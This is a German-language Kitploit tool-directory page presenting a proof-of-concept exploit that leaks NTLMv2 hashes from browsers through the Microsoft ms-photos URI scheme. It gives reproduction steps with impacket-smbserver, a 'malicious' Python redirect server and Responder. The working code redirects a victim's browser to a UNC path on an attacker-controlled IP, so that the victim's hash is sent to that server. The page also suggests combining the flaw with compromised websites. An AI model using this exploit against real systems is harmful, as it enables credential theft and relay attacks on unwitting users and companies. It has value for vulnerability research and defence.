Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ms-photos_NTLM_Leak — Neue 0-Day-Sicherheitslücke, die das Leaken von NTLM-Hashes aus Browsern mit einem Klick ermöglicht. | Kitploit
Tools/GitHubGitHub/rubenformation/ms-photos_ntlm_leak
PasswortangriffeSchwachstellenanalyseExploitationLaterale BewegungPhishingLernen & BildungRed Teaming
GitHubrubenformation/ms-photos_ntlm_leak

ms-photos_NTLM_Leak

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Neue 0-Day-Sicherheitslücke, die das Leaken von NTLM-Hashes aus Browsern mit einem Klick ermöglicht.

Repository anzeigen
20931vor 9 MonatenVon Kitploit geprüft

Microsoft ms-photos URI NTLM Leak

Neue Sicherheitslücke ermöglicht das Leaken von NTLM-Hashes aus Browsern mit einem Klick

Von Ruben Enkaoua

Beschreibung


Das Microsoft ms-photos URI-Schema nimmt fileName als Parameter entgegen, der mit einem UNC-Pfad übergeben werden kann, wodurch NTLMv2-SSP-Hashes beim Öffnen geleakt werden. Durch Erstellen eines speziell formatierten Links kann ein Angreifer ein Opfer dazu zwingen, die Microsoft Photos App direkt aus einem Browser zu starten. Wenn ausgelöst, führt dieses Verhalten zum Leaken des NTLMv2-SSP-Hash des Opfers an einen vom Angreifer kontrollierten Server. Dieses Problem ermöglicht die Offenlegung von Anmeldeinformationen und potenzielle Relay-Angriffe in Unternehmensumgebungen und erfordert nur minimale Benutzerinteraktion (Öffnen der App). Microsoft hat die Sicherheitslücke nicht anerkannt und es wurde keine CVE ausgestellt. Außerdem wurde ich vom Syss Blog aus dem Jahr 2022 inspiriert.

Da die NTLMv2-SSP-Challenge an öffentlich zugängliche UNC-Pfade geleakt werden kann (außer wenn eine ausgehende SMB/445-Firewallregel gesetzt ist), kann die Sicherheitslücke mit Website-Infektionen kombiniert werden, was zu Supply-Chain-Angriffen führt.

Aus der MSDN-Dokumentation über das URI-Schema finden wir Folgendes:


Bild


Schritte zur Reproduktion


Starte den SMB-Server

root@kitploit:~
# With a picture: Opens the photo on the target with photos.exe
# Without a picture: Nothing, no photos.exe process window 
impacket-smbserver share . -smb2support

Starte den bösartigen Python-Server

root@kitploit:~
# Edit first the information about the IP, share, and filename for UNC coercing. 
python3 ms-photos-server.py

Rufe den Ort auf

Öffne Chrome und navigiere zu /test


poc


Außerdem kann es mit Responder gemacht werden. Alle unaufgelösten Domänen, die eine LLMNR-Anfrage stellen, werden zum Skript umgeleitet, was es erlaubt, jeden Benutzer zu zwingen, anstatt ein NTLM-Benutzer-/Passwort-Authentifizierungsfenster anzuzeigen. Um es zum Laufen zu bringen, führen Sie zuerst das Skript und dann den Responder aus.


poc2


Es funktioniert, weil unsere Anwendung direkt auf ein ms-photos URI-Schema umleitet, das den UNC-Pfad unseres Servers enthält:


root@kitploit:~
class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/":
            self.send_response(302)  # HTTP 302 Found (temporary redirect)
            self.send_header('Location', 'ms-photos:viewer?fileName=\\\\192.168.159.129\\share\\Capture.png')
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"Not Found")

Umleitung von der Client-Seite:


Bild


Hinweise


Dieser Code dient nur zu Bildungs- und Forschungszwecken.
Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch dieses Codes.
Tool herunterladen